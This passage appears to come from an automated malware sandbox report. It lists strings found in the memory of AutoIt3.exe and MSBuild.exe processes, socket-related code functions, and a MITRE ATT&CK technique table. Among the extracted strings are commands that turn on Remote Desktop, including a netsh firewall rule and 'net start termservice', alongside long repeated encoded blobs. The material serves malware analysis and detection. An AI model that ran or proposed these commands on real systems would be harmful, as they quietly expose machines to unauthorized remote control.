==MSHo3c5uIbjBPp==NR3z4z0r8G5KhXFaTat87LtkeTDj5Gem9839BQi08C5ce3NiQPNo6KNm2ZZmQWJ=RQfYLx0KRIRRfnNagfJt66XSgjZuL2ORUtHA2gWv66B3T2cihzNQT1BG2TRnOEGm9Mv64z0vNqJj2Q==NR3y3A0XT1NE1W5aVLDoPz0jT6lfdmxhgOXl7Lxqg0H35n7VbMiBCMNwHHYSQzkUQN0=IMPz1PSsTKYjRQfYLx0KRIRRfnNagfJt66XSgjZuL2ORUtHA2gWv66B3YW9eiyNaPqdc3TZeH02FSuDUJyCTMYVvW1A=RQfYLx0KRIRlenVngUpJT1IoQAveL2OpabfoPQS KqJpdWRtfPFm6KxX1CPrQGOmSbfpPPdGLE==UsuBCwF=OvPrOQ0p8JRbgHVege6pFp K3UDx3HOR8L3zOvPrOQ0p8JRbgHVege6pFpdK3UDx3HOR8L3zRP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSGlJeW K7ZofmZjixRb7rFhfZU=RwDAPA0g8I98eWY=J9uCEJ==J9uDC ==J9uCD ==J9uDDJ==NSPD3f0r8INRdWB Up==L9ia cPzPzCpGDMk2XlaIRmlFcLm3Vyo50BiLCcbNu1f6WsaF8urzbGX505be3ZPNvw7DmQ93DLuzA==G8SlHQmm8GM=F8urzbGvT087FrSryt==Rv38PQOw5KZieC9ajyM=ILP9PPSY8KplenFkgyd 9Wtq3TRx5GOq8L8zPPVdFY3feGY6N9==F6== Rb64zWs8687OXQ6QPI7GE== SKd3p== bzzPzdqABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Keyboard Layout\Preload0000041900000422000004230000043fSystemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice start= aut
                      Source: AutoIt3.exe, 00000026.00000002.2411185727.0000000004550000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: net start termservice
                      Source: AutoIt3.exe, 00000026.00000002.2411185727.0000000004550000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: Unknown exceptionbad array new length: genericiostreamiostream stream errorFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit set805f14f85ee1dae0f3315e33e81c2a42cb36de7f397799e419deb9caf3a96a89322a8d6d5a45058fa30d5968f8d3f9443ad8a7JIODBcl2FnIVRC8mRbI=IobnPxWw8nRadzNvWa1f6qJdizVy2Ht=KHYBCp==RnUq2AZqGHVx4J==IHPx4J==WI8qCcJ2SngmQg==OSb54Q0qFqZU2Q==RP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSHhGW0v7qZkgF3ahfFf66X5YkLwK2YaWF==RP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSHhGW0v7qZkgF3ahfFf66X5VU8y3G2pWMDhLQSi7mFJdGZhgutw66pc3UzBRSLm3gWY7E==RbPyVRVpyvdACJNDUEpHNu1pF7w9RP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSHhGW0v7qZkgF3ahfFf66X5YkLw cPzPzCpGDM7RwDAPWOe61Q=RP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSHhGW0v7qZkgF3ahfFf66X5VU8y3G2pWMDhKVmi6KA7Umch4yNo7A==GKPYHOONOocwVUBuOI==UtzB3t==Rt3YLt==OPPZ8LKaacGa RKa9SGaVbeaVMCa vGaaLYaWvUaVMSa9wSa9R7a 9U=VSDqPv h6KBY12BehuXa6Kp0VSDqPv h6KA=VRru3v h6KA=Wsy=WIy=WIC=WIG=QLzu2 ==8wL53wtsFA==8wL53AR3FCb=WMbqWvrxVRVp wGC9MHubbfBISz61P0XMvG+MvK+IQvx4Pim6rQlHnmwFl==cp==GcPz1QV6MF== Rbq2zBwGm9aeGA=8RPD2f0pGDMk2GBhORP5JfKX513bX3poiyNjM0Xeft==RwDAPWOe6YV8gGJ2NKTGKUVdO6ccgHh7heM=NMTu3fJ=PRzE3z0v76xVLEB739==OKHKLt==RvzzPzJdO6Z gXNeizc=Ov3o4zdvCJhb1g==NKTMJoSBLzdXS0BJ2WRQhedQ9U==Nbf5Pz0jT09a2XM=Qb3D4zdrRR3B1zdwNR3y2VWsSRfzHz0jT09a2XM=JsyDCsVYHngURQ== bC=aRC=NR3z4z0r8G5KhXFaTatj80pSeUrj4nJmWb3D2L6hS1V8RyF8gVNkTKxqiQQvCSTkIHUyBL5qAFjI2V XT09QOUVehVtl76dSeTZwFiud9SDyBPWe8KIXLG97gOMZCqJ hDukFyud8Lrq2fKqTX49F6UPGVdr8KZkgC5JjPtbImt gEru2WG9avfA2bdsS7VbgC5oizBbS0SFGdQMAFiyBL5qFW4=IHUSs ==MSHo3c5uIbjBPp==NR3z4z0r8G5KhXFaTat87LtkeTDj5Gem9839BQi08C5ce3NiQPNo6KNm2ZZmQWJ=RQfYLx0KRIRRfnNagfJt66XSgjZuL2ORUtHA2gWv66B3T2cihzNQT1BG2TRnOEGm9Mv64z0vNqJj2Q==NR3y3A0XT1NE1W5aVLDoPz0jT6lfdmxhgOXl7Lxqg0H35n7VbMiBCMNwHHYSQzkUQN0=IMPz1PSsTKYjRQfYLx0KRIRRfnNagfJt66XSgjZuL2ORUtHA2gWv66B3YW9eiyNaPqdc3TZeH02FSuDUJyCTMYVvW1A=RQfYLx0KRIRlenVngUpJT1IoQAveL2OpabfoPQS KqJpdWRtfPFm6KxX1CPrQGOmSbfpPPdGLE==UsuBCwF=OvPrOQ0p8JRbgHVege6pFp K3UDx3HOR8L3zOvPrOQ0p8JRbgHVege6pFpdK3UDx3HOR8L3zRP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSGlJeW K7ZofmZjixRb7rFhfZU=RwDAPA0g8I98eWY=J9uCEJ==J9uDC ==J9uCD ==J9uDDJ==NSPD3f0r8INRdWB Up==L9ia cPzPzCpGDMk2XlaIRmlFcLm3Vyo50BiLCcbNu1f6WsaF8urzbGX505be3ZPNvw7DmQ93DLuzA==G8SlHQmm8GM=F8urzbGvT087FrSryt==Rv38PQOw5KZieC9ajyM=ILP9PPSY8KplenFkgyd 9Wtq3TRx5GOq8L8zPPVdFY3feGY6N9==F6== Rb64zWs8687OXQ6QPI7GE== SKd3p== bzzPzdqABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Keyboard Layout\Preload0000041900000422000004230000043fSystemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice start= aut
                      Source: MSBuild.exeString found in binary or memory: net start termservice
                      Source: MSBuild.exe, 00000029.00000002.2409431093.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: net start termservice
                      Source: MSBuild.exe, 00000029.00000002.2409431093.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: Unknown exceptionbad array new length: genericiostreamiostream stream errorFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit set805f14f85ee1dae0f3315e33e81c2a42cb36de7f397799e419deb9caf3a96a89322a8d6d5a45058fa30d5968f8d3f9443ad8a7JIODBcl2FnIVRC8mRbI=IobnPxWw8nRadzNvWa1f6qJdizVy2Ht=KHYBCp==RnUq2AZqGHVx4J==IHPx4J==WI8qCcJ2SngmQg==OSb54Q0qFqZU2Q==RP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSHhGW0v7qZkgF3ahfFf66X5YkLwK2YaWF==RP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSHhGW0v7qZkgF3ahfFf66X5VU8y3G2pWMDhLQSi7mFJdGZhgutw66pc3UzBRSLm3gWY7E==RbPyVRVpyvdACJNDUEpHNu1pF7w9RP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSHhGW0v7qZkgF3ahfFf66X5YkLw cPzPzCpGDM7RwDAPWOe61Q=RP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSHhGW0v7qZkgF3ahfFf66X5VU8y3G2pWMDhKVmi6KA7Umch4yNo7A==GKPYHOONOocwVUBuOI==UtzB3t==Rt3YLt==OPPZ8LKaacGa RKa9SGaVbeaVMCa vGaaLYaWvUaVMSa9wSa9R7a 9U=VSDqPv h6KBY12BehuXa6Kp0VSDqPv h6KA=VRru3v h6KA=Wsy=WIy=WIC=WIG=QLzu2 ==8wL53wtsFA==8wL53AR3FCb=WMbqWvrxVRVp wGC9MHubbfBISz61P0XMvG+MvK+IQvx4Pim6rQlHnmwFl==cp==GcPz1QV6MF== Rbq2zBwGm9aeGA=8RPD2f0pGDMk2GBhORP5JfKX513bX3poiyNjM0Xeft==RwDAPWOe6YV8gGJ2NKTGKUVdO6ccgHh7heM=NMTu3fJ=PRzE3z0v76xVLEB739==OKHKLt==RvzzPzJdO6Z gXNeizc=Ov3o4zdvCJhb1g==NKTMJoSBLzdXS0BJ2WRQhedQ9U==Nbf5Pz0jT09a2XM=Qb3D4zdrRR3B1zdwNR3y2VWsSRfzHz0jT09a2XM=JsyDCsVYHngURQ== bC=aRC=NR3z4z0r8G5KhXFaTatj80pSeUrj4nJmWb3D2L6hS1V8RyF8gVNkTKxqiQQvCSTkIHUyBL5qAFjI2V XT09QOUVehVtl76dSeTZwFiud9SDyBPWe8KIXLG97gOMZCqJ hDukFyud8Lrq2fKqTX49F6UPGVdr8KZkgC5JjPtbImt gEru2WG9avfA2bdsS7VbgC5oizBbS0SFGdQMAFiyBL5qFW4=IHUSs ==MSHo3c5uIbjBPp==NR3z4z0r8G5KhXFaTat87LtkeTDj5Gem9839BQi08C5ce3NiQPNo6KNm2ZZmQWJ=RQfYLx0KRIRRfnNagfJt66XSgjZuL2ORUtHA2gWv66B3T2cihzNQT1BG2TRnOEGm9Mv64z0vNqJj2Q==NR3y3A0XT1NE1W5aVLDoPz0jT6lfdmxhgOXl7Lxqg0H35n7VbMiBCMNwHHYSQzkUQN0=IMPz1PSsTKYjRQfYLx0KRIRRfnNagfJt66XSgjZuL2ORUtHA2gWv66B3YW9eiyNaPqdc3TZeH02FSuDUJyCTMYVvW1A=RQfYLx0KRIRlenVngUpJT1IoQAveL2OpabfoPQS KqJpdWRtfPFm6KxX1CPrQGOmSbfpPPdGLE==UsuBCwF=OvPrOQ0p8JRbgHVege6pFp K3UDx3HOR8L3zOvPrOQ0p8JRbgHVege6pFpdK3UDx3HOR8L3zRP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSGlJeW K7ZofmZjixRb7rFhfZU=RwDAPA0g8I98eWY=J9uCEJ==J9uDC ==J9uCD ==J9uDDJ==NSPD3f0r8INRdWB Up==L9ia cPzPzCpGDMk2XlaIRmlFcLm3Vyo50BiLCcbNu1f6WsaF8urzbGX505be3ZPNvw7DmQ93DLuzA==G8SlHQmm8GM=F8urzbGvT087FrSryt==Rv38PQOw5KZieC9ajyM=ILP9PPSY8KplenFkgyd 9Wtq3TRx5GOq8L8zPPVdFY3feGY6N9==F6== Rb64zWs8687OXQ6QPI7GE== SKd3p== bzzPzdqABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Keyboard Layout\Preload0000041900000422000004230000043fSystemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice start= aut
                      Source: AutoIt3.exe, 0000002A.00000003.2497527821.0000000004AD0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: net start termservice
                      Source: AutoIt3.exe, 0000002A.00000003.2497527821.0000000004AD0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: Unknown exceptionbad array new length: genericiostreamiostream stream errorFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit set805f14f85ee1dae0f3315e33e81c2a42cb36de7f397799e419deb9caf3a96a89322a8d6d5a45058fa30d5968f8d3f9443ad8a7JIODBcl2FnIVRC8mRbI=IobnPxWw8nRadzNvWa1f6qJdizVy2Ht=KHYBCp==RnUq2AZqGHVx4J==IHPx4J==WI8qCcJ2SngmQg==OSb54Q0qFqZU2Q==RP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSHhGW0v7qZkgF3ahfFf66X5YkLwK2YaWF==RP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSHhGW0v7qZkgF3ahfFf66X5VU8y3G2pWMDhLQSi7mFJdGZhgutw66pc3UzBRSLm3gWY7E==RbPyVRVpyvdACJNDUEpHNu1pF7w9RP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSHhGW0v7qZkgF3ahfFf66X5YkLw cPzPzCpGDM7RwDAPWOe61Q=RP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSHhGW0v7qZkgF3ahfFf66X5VU8y3G2pWMDhKVmi6KA7Umch4yNo7A==GKPYHOONOocwVUBuOI==UtzB3t==Rt3YLt==OPPZ8LKaacGa RKa9SGaVbeaVMCa vGaaLYaWvUaVMSa9wSa9R7a 9U=VSDqPv h6KBY12BehuXa6Kp0VSDqPv h6KA=VRru3v h6KA=Wsy=WIy=WIC=WIG=QLzu2 ==8wL53wtsFA==8wL53AR3FCb=WMbqWvrxVRVp wGC9MHubbfBISz61P0XMvG+MvK+IQvx4Pim6rQlHnmwFl==cp==GcPz1QV6MF== Rbq2zBwGm9aeGA=8RPD2f0pGDMk2GBhORP5JfKX513bX3poiyNjM0Xeft==RwDAPWOe6YV8gGJ2NKTGKUVdO6ccgHh7heM=NMTu3fJ=PRzE3z0v76xVLEB739==OKHKLt==RvzzPzJdO6Z gXNeizc=Ov3o4zdvCJhb1g==NKTMJoSBLzdXS0BJ2WRQhedQ9U==Nbf5Pz0jT09a2XM=Qb3D4zdrRR3B1zdwNR3y2VWsSRfzHz0jT09a2XM=JsyDCsVYHngURQ== bC=aRC=NR3z4z0r8G5KhXFaTatj80pSeUrj4nJmWb3D2L6hS1V8RyF8gVNkTKxqiQQvCSTkIHUyBL5qAFjI2V XT09QOUVehVtl76dSeTZwFiud9SDyBPWe8KIXLG97gOMZCqJ hDukFyud8Lrq2fKqTX49F6UPGVdr8KZkgC5JjPtbImt gEru2WG9avfA2bdsS7VbgC5oizBbS0SFGdQMAFiyBL5qFW4=IHUSs ==MSHo3c5uIbjBPp==NR3z4z0r8G5KhXFaTat87LtkeTDj5Gem9839BQi08C5ce3NiQPNo6KNm2ZZmQWJ=RQfYLx0KRIRRfnNagfJt66XSgjZuL2ORUtHA2gWv66B3T2cihzNQT1BG2TRnOEGm9Mv64z0vNqJj2Q==NR3y3A0XT1NE1W5aVLDoPz0jT6lfdmxhgOXl7Lxqg0H35n7VbMiBCMNwHHYSQzkUQN0=IMPz1PSsTKYjRQfYLx0KRIRRfnNagfJt66XSgjZuL2ORUtHA2gWv66B3YW9eiyNaPqdc3TZeH02FSuDUJyCTMYVvW1A=RQfYLx0KRIRlenVngUpJT1IoQAveL2OpabfoPQS KqJpdWRtfPFm6KxX1CPrQGOmSbfpPPdGLE==UsuBCwF=OvPrOQ0p8JRbgHVege6pFp K3UDx3HOR8L3zOvPrOQ0p8JRbgHVege6pFpdK3UDx3HOR8L3zRP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSGlJeW K7ZofmZjixRb7rFhfZU=RwDAPA0g8I98eWY=J9uCEJ==J9uDC ==J9uCD ==J9uDDJ==NSPD3f0r8INRdWB Up==L9ia cPzPzCpGDMk2XlaIRmlFcLm3Vyo50BiLCcbNu1f6WsaF8urzbGX505be3ZPNvw7DmQ93DLuzA==G8SlHQmm8GM=F8urzbGvT087FrSryt==Rv38PQOw5KZieC9ajyM=ILP9PPSY8KplenFkgyd 9Wtq3TRx5GOq8L8zPPVdFY3feGY6N9==F6== Rb64zWs8687OXQ6QPI7GE== SKd3p== bzzPzdqABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Keyboard Layout\Preload0000041900000422000004230000043fSystemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice start= aut
                      Source: AutoIt3.exe, 0000002A.00000002.2499423017.00000000043F0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: net start termservice
                      Source: AutoIt3.exe, 0000002A.00000002.2499423017.00000000043F0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: Unknown exceptionbad array new length: genericiostreamiostream stream errorFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit set805f14f85ee1dae0f3315e33e81c2a42cb36de7f397799e419deb9caf3a96a89322a8d6d5a45058fa30d5968f8d3f9443ad8a7JIODBcl2FnIVRC8mRbI=IobnPxWw8nRadzNvWa1f6qJdizVy2Ht=KHYBCp==RnUq2AZqGHVx4J==IHPx4J==WI8qCcJ2SngmQg==OSb54Q0qFqZU2Q==RP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSHhGW0v7qZkgF3ahfFf66X5YkLwK2YaWF==RP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSHhGW0v7qZkgF3ahfFf66X5VU8y3G2pWMDhLQSi7mFJdGZhgutw66pc3UzBRSLm3gWY7E==RbPyVRVpyvdACJNDUEpHNu1pF7w9RP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSHhGW0v7qZkgF3ahfFf66X5YkLw cPzPzCpGDM7RwDAPWOe61Q=RP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSHhGW0v7qZkgF3ahfFf66X5VU8y3G2pWMDhKVmi6KA7Umch4yNo7A==GKPYHOONOocwVUBuOI==UtzB3t==Rt3YLt==OPPZ8LKaacGa RKa9SGaVbeaVMCa vGaaLYaWvUaVMSa9wSa9R7a 9U=VSDqPv h6KBY12BehuXa6Kp0VSDqPv h6KA=VRru3v h6KA=Wsy=WIy=WIC=WIG=QLzu2 ==8wL53wtsFA==8wL53AR3FCb=WMbqWvrxVRVp wGC9MHubbfBISz61P0XMvG+MvK+IQvx4Pim6rQlHnmwFl==cp==GcPz1QV6MF== Rbq2zBwGm9aeGA=8RPD2f0pGDMk2GBhORP5JfKX513bX3poiyNjM0Xeft==RwDAPWOe6YV8gGJ2NKTGKUVdO6ccgHh7heM=NMTu3fJ=PRzE3z0v76xVLEB739==OKHKLt==RvzzPzJdO6Z gXNeizc=Ov3o4zdvCJhb1g==NKTMJoSBLzdXS0BJ2WRQhedQ9U==Nbf5Pz0jT09a2XM=Qb3D4zdrRR3B1zdwNR3y2VWsSRfzHz0jT09a2XM=JsyDCsVYHngURQ== bC=aRC=NR3z4z0r8G5KhXFaTatj80pSeUrj4nJmWb3D2L6hS1V8RyF8gVNkTKxqiQQvCSTkIHUyBL5qAFjI2V XT09QOUVehVtl76dSeTZwFiud9SDyBPWe8KIXLG97gOMZCqJ hDukFyud8Lrq2fKqTX49F6UPGVdr8KZkgC5JjPtbImt gEru2WG9avfA2bdsS7VbgC5oizBbS0SFGdQMAFiyBL5qFW4=IHUSs ==MSHo3c5uIbjBPp==NR3z4z0r8G5KhXFaTat87LtkeTDj5Gem9839BQi08C5ce3NiQPNo6KNm2ZZmQWJ=RQfYLx0KRIRRfnNagfJt66XSgjZuL2ORUtHA2gWv66B3T2cihzNQT1BG2TRnOEGm9Mv64z0vNqJj2Q==NR3y3A0XT1NE1W5aVLDoPz0jT6lfdmxhgOXl7Lxqg0H35n7VbMiBCMNwHHYSQzkUQN0=IMPz1PSsTKYjRQfYLx0KRIRRfnNagfJt66XSgjZuL2ORUtHA2gWv66B3YW9eiyNaPqdc3TZeH02FSuDUJyCTMYVvW1A=RQfYLx0KRIRlenVngUpJT1IoQAveL2OpabfoPQS KqJpdWRtfPFm6KxX1CPrQGOmSbfpPPdGLE==UsuBCwF=OvPrOQ0p8JRbgHVege6pFp K3UDx3HOR8L3zOvPrOQ0p8JRbgHVege6pFpdK3UDx3HOR8L3zRP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSGlJeW K7ZofmZjixRb7rFhfZU=RwDAPA0g8I98eWY=J9uCEJ==J9uDC ==J9uCD ==J9uDDJ==NSPD3f0r8INRdWB Up==L9ia cPzPzCpGDMk2XlaIRmlFcLm3Vyo50BiLCcbNu1f6WsaF8urzbGX505be3ZPNvw7DmQ93DLuzA==G8SlHQmm8GM=F8urzbGvT087FrSryt==Rv38PQOw5KZieC9ajyM=ILP9PPSY8KplenFkgyd 9Wtq3TRx5GOq8L8zPPVdFY3feGY6N9==F6== Rb64zWs8687OXQ6QPI7GE== SKd3p== bzzPzdqABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Keyboard Layout\Preload0000041900000422000004230000043fSystemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice start= aut
                      Source: AutoIt3.exe, 0000002A.00000003.2497625413.00000000048DC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: net start termservice
                      Source: AutoIt3.exe, 0000002A.00000003.2497625413.00000000048DC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: Unknown exceptionbad array new length: genericiostreamiostream stream errorFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit set805f14f85ee1dae0f3315e33e81c2a42cb36de7f397799e419deb9caf3a96a89322a8d6d5a45058fa30d5968f8d3f9443ad8a7JIODBcl2FnIVRC8mRbI=IobnPxWw8nRadzNvWa1f6qJdizVy2Ht=KHYBCp==RnUq2AZqGHVx4J==IHPx4J==WI8qCcJ2SngmQg==OSb54Q0qFqZU2Q==RP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSHhGW0v7qZkgF3ahfFf66X5YkLwK2YaWF==RP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSHhGW0v7qZkgF3ahfFf66X5VU8y3G2pWMDhLQSi7mFJdGZhgutw66pc3UzBRSLm3gWY7E==RbPyVRVpyvdACJNDUEpHNu1pF7w9RP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSHhGW0v7qZkgF3ahfFf66X5YkLw cPzPzCpGDM7RwDAPWOe61Q=RP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSHhGW0v7qZkgF3ahfFf66X5VU8y3G2pWMDhKVmi6KA7Umch4yNo7A==GKPYHOONOocwVUBuOI==UtzB3t==Rt3YLt==OPPZ8LKaacGa RKa9SGaVbeaVMCa vGaaLYaWvUaVMSa9wSa9R7a 9U=VSDqPv h6KBY12BehuXa6Kp0VSDqPv h6KA=VRru3v h6KA=Wsy=WIy=WIC=WIG=QLzu2 ==8wL53wtsFA==8wL53AR3FCb=WMbqWvrxVRVp wGC9MHubbfBISz61P0XMvG+MvK+IQvx4Pim6rQlHnmwFl==cp==GcPz1QV6MF== Rbq2zBwGm9aeGA=8RPD2f0pGDMk2GBhORP5JfKX513bX3poiyNjM0Xeft==RwDAPWOe6YV8gGJ2NKTGKUVdO6ccgHh7heM=NMTu3fJ=PRzE3z0v76xVLEB739==OKHKLt==RvzzPzJdO6Z gXNeizc=Ov3o4zdvCJhb1g==NKTMJoSBLzdXS0BJ2WRQhedQ9U==Nbf5Pz0jT09a2XM=Qb3D4zdrRR3B1zdwNR3y2VWsSRfzHz0jT09a2XM=JsyDCsVYHngURQ== bC=aRC=NR3z4z0r8G5KhXFaTatj80pSeUrj4nJmWb3D2L6hS1V8RyF8gVNkTKxqiQQvCSTkIHUyBL5qAFjI2V XT09QOUVehVtl76dSeTZwFiud9SDyBPWe8KIXLG97gOMZCqJ hDukFyud8Lrq2fKqTX49F6UPGVdr8KZkgC5JjPtbImt gEru2WG9avfA2bdsS7VbgC5oizBbS0SFGdQMAFiyBL5qFW4=IHUSs ==MSHo3c5uIbjBPp==NR3z4z0r8G5KhXFaTat87LtkeTDj5Gem9839BQi08C5ce3NiQPNo6KNm2ZZmQWJ=RQfYLx0KRIRRfnNagfJt66XSgjZuL2ORUtHA2gWv66B3T2cihzNQT1BG2TRnOEGm9Mv64z0vNqJj2Q==NR3y3A0XT1NE1W5aVLDoPz0jT6lfdmxhgOXl7Lxqg0H35n7VbMiBCMNwHHYSQzkUQN0=IMPz1PSsTKYjRQfYLx0KRIRRfnNagfJt66XSgjZuL2ORUtHA2gWv66B3YW9eiyNaPqdc3TZeH02FSuDUJyCTMYVvW1A=RQfYLx0KRIRlenVngUpJT1IoQAveL2OpabfoPQS KqJpdWRtfPFm6KxX1CPrQGOmSbfpPPdGLE==UsuBCwF=OvPrOQ0p8JRbgHVege6pFp K3UDx3HOR8L3zOvPrOQ0p8JRbgHVege6pFpdK3UDx3HOR8L3zRP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSGlJeW K7ZofmZjixRb7rFhfZU=RwDAPA0g8I98eWY=J9uCEJ==J9uDC ==J9uCD ==J9uDDJ==NSPD3f0r8INRdWB Up==L9ia cPzPzCpGDMk2XlaIRmlFcLm3Vyo50BiLCcbNu1f6WsaF8urzbGX505be3ZPNvw7DmQ93DLuzA==G8SlHQmm8GM=F8urzbGvT087FrSryt==Rv38PQOw5KZieC9ajyM=ILP9PPSY8KplenFkgyd 9Wtq3TRx5GOq8L8zPPVdFY3feGY6N9==F6== Rb64zWs8687OXQ6QPI7GE== SKd3p== bzzPzdqABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Keyboard Layout\Preload0000041900000422000004230000043fSystemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice start= aut
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeCode function: 35_2_007523E0 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,35_2_007523E0
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeCode function: 35_2_00751DD8 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,35_2_00751DD8
                      Source: C:\edgheaa\AutoIt3.exeCode function: 38_2_00CF23E0 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,38_2_00CF23E0
                      Source: C:\edgheaa\AutoIt3.exeCode function: 38_2_00CF1DD8 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,38_2_00CF1DD8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 41_2_0043C0FA Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::ReleaseInternalContext,41_2_0043C0FA
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 41_2_0043B403 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext,41_2_0043B403
                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire Infrastructure2
                      Valid Accounts
                      11
                      Windows Management Instrumentation
                      1
                      DLL Side-Loading
                      1
                      Exploitation for Privilege Escalation
                      11
                      Disable or Modify Tools
                      21
                      Input Capture
                      2
                      System Time Discovery
                      1
                      Remote Desktop Protocol
                      1
                      Archive Collected Data
                      1
                      Ingress Tool Transfer
                      Exfiltration Over Other Network Medium1
                      System Shutdown/Reboot
                      CredentialsDomainsDefault Accounts1
                      Native API
                      1
                      Create Account
                      1
                      DLL Side-Loading
                      1
